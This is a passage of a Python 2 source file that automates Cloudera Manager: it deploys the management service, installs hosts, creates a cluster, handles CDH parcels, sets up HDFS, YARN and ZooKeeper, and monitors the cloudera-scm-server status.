elif group.roleType == "SERVICEMONITOR":
group.update_config(SMON_ROLE_CONFIG)
# elif group.roleType == "NAVIGATOR":
# group.update_config(NAV_ROLE_CONFIG)
# elif group.roleType == "NAVIGATORMETADATASERVER":
# group.update_config(NAVMS_ROLE_CONFIG)
# elif group.roleType == "REPORTSMANAGER":
# group.update_config(RMAN_ROLE_CONFIG)
# now start the management service
mgmt.start().wait()
return mgmt
def create_cluster(self):
"""
Create a cluster and Cloudera Manager Service on master host
"""
log.info("Creating Cloudera cluster: '{0}'. Please wait...".format(self.cluster_name))
### CM Definitions ###
CM_CONFIG = {
'TSQUERY_STREAMS_LIMIT' : 1000,
}
### Create and deploy new cluster ##
ar = self.cm_api_resource
manager = self.cm_manager
manager.update_config(CM_CONFIG)
log.info("Connected to CM host on " + self.cm_host + " and updated CM configuration")
## Initialize a cluster ##
cluster = self.init_cluster(ar)
log.info("Initialized cluster " + self.cluster_name + " which uses CDH version " + self.cdh_version_number)
## Deploy management service ##
self.deploy_management(manager)
log.info("Deployed CM management service " + self.mgmt_service_name + " to run on " + self.cm_host)
# install hosts on this CM instance
cmd = self.cm_manager.host_install(self.host_username, self.host_list,
password=self.host_password,
cm_repo_url=self.cm_repo_url)
log.debug("Installing hosts. This might take a while...")
while cmd.success is None:
sleep(5)
cmd = cmd.fetch()
if cmd.success is not True:
log.error("Adding hosts to Cloudera Manager failed: {0}".format(cmd.resultMessage))
log.debug("Host added to Cloudera Manager")
# first auto-assign roles and auto-configure the CM service
self.cm_manager.auto_assign_roles()
self.cm_manager.auto_configure()
# create a cluster on that instance
cluster = self.cm_api_resource.create_cluster(self.cluster_name, self.cdh_version)
log.debug("Cloudera cluster: {0} created".format(self.cluster_name))
# add all hosts on the cluster
cluster.add_hosts(self.host_list)
cluster = self.cm_api_resource.get_cluster(self.cluster_name)
# get and list all available parcels
parcels_list = []
log.debug("Installing parcels...")
for p in cluster.get_all_parcels():
print '\t' + p.product + ' ' + p.version
if p.version.startswith(self.cdh_version_number) and p.product == "CDH":
parcels_list.append(p)
if len(parcels_list) == 0:
log.error("No {0} parcel found!".format(self.cdh_version))
cdh_parcel = parcels_list[0]
for p in parcels_list:
if p.version > cdh_parcel.version:
cdh_parcel = p
# download the parcel
log.debug("Starting parcel downloading...")
cmd = cdh_parcel.start_download()
if cmd.success is not True:
log.error("Parcel download failed!")
# make sure the download finishes
while cdh_parcel.stage != 'DOWNLOADED':
sleep(5)
cdh_parcel = get_parcel(self.cm_api_resource, cdh_parcel.product, cdh_parcel.version, self.cluster_name)
log.debug("Parcel: {0} {1} downloaded".format(cdh_parcel.product, cdh_parcel.version))
# distribute the parcel
log.debug("Distributing parcels...")
cmd = cdh_parcel.start_distribution()
if cmd.success is not True:
log.error("Parcel distribution failed!")
# make sure the distribution finishes
while cdh_parcel.stage != "DISTRIBUTED":
sleep(5)
cdh_parcel = get_parcel(self.cm_api_resource, cdh_parcel.product, cdh_parcel.version, self.cluster_name)
log.debug("Parcel: {0} {1} distributed".format(cdh_parcel.product, cdh_parcel.version))
# activate the parcel
log.debug("Activating parcels...")
cmd = cdh_parcel.activate()
if cmd.success is not True:
log.error("Parcel activation failed!")
# make sure the activation finishes
while cdh_parcel.stage != "ACTIVATED":
cdh_parcel = get_parcel(self.cm_api_resource, cdh_parcel.product, cdh_parcel.version, self.cluster_name)
log.debug("Parcel: {0} {1} activated".format(cdh_parcel.product, cdh_parcel.version))
# inspect hosts and print the result
log.debug("Inspecting hosts. This might take a few minutes")
cmd = self.cm_manager.inspect_hosts()
while cmd.success is None:
sleep(5)
cmd = cmd.fetch()
if cmd.success is not True:
log.error("Host inpsection failed!")
log.debug("Hosts successfully inspected:\n".format(cmd.resultMessage))
log.info("Cluster '{0}' installed".format(self.cluster_name))
def setup_cluster(self):
"""
Setup the default cluster and start basic services (HDFS, YARN and ZOOKEEPER)
"""
log.info("Setting up cluster services...")
# get the cluster
cluster = self.cm_api_resource.get_cluster(self.cluster_name)
# create all the services we want to add; we will only create one instance of each
for s in self.service_types_and_names.keys():
service_name = self.service_types_and_names[s]
cluster.create_service(service_name, s)
log.debug("Service: {0} added".format(service_name))
# auto-assign roles
cluster.auto_assign_roles()
cluster.auto_configure()
# start the management service
cm_service = self.cm_manager.get_service()
# create_CM_roles(master_node, cm_service)
cm_service.start().wait()
# execute the first run command
log.debug("Executing first run command. This might take a while...")
cmd = cluster.first_run()
while cmd.success is None:
sleep(5)
cmd = cmd.fetch()
if cmd.success is not True:
log.error("The first run command failed: {0}".format(cmd.resultMessage()))
log.info("First run successfully executed. Your cluster has been set up!")
def status(self):
"""
Check and update the status of the service.
"""
if self.state == service_states.UNSTARTED or \
self.state == service_states.STARTING or \
self.state == service_states.SHUTTING_DOWN or \
self.state == service_states.SHUT_DOWN or \
self.state == service_states.WAITING_FOR_USER_ACTION:
return
# Capture possible status messages from /etc/init.d/cloudera-scm-server
status_output = ['is dead and pid file exists',
'is dead and lock file exists',
'is not running',
'status is unknown']
svc_status = misc.getoutput('service cloudera-scm-server status', quiet=True)
for so in status_output:
if so in svc_status:
log.warning("Cloudera server not running: {0}.".format(so))
if self.remaining_start_attempts > 0:
log.debug("Resetting ClouderaManager service")
self.state = service_states.UNSTARTED
else:
log.error("Exceeded number of restart attempts; "
"ClouderaManager service in ERROR.")
self.state = service_states.ERROR
if not self.started:
pass
elif 'is running' in svc_status:
self.state = service_states.RUNNING
# Once the service gets running, reset the number of start attempts
self.remaining_start_attempts = NUM_START_ATTEMPTS
|